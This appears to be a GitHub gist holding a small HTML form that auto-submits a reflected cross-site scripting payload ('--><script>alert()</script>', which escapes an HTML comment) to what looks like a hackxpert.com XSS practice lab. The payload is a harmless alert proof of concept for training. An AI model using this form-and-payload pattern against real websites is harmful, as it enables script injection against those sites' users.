Created
October 22, 2021 00:14
-
-
Save The-XSS-Rat/a4bddb3961056b37bc5f699f1e9e5147 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://hackxpert.com/RXSS/POST/20.php"><table><tr><td>say</td><td><input type="text" value="Hi" name="say"></td></tr> | |
<tr><td>hidden</td><td><input type="text" value="--><script>alert()</script>" name="hidden"></td></tr> | |
</table><input type="submit" value="http://hackxpert.com/RXSS/POST/20.php"></form></html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment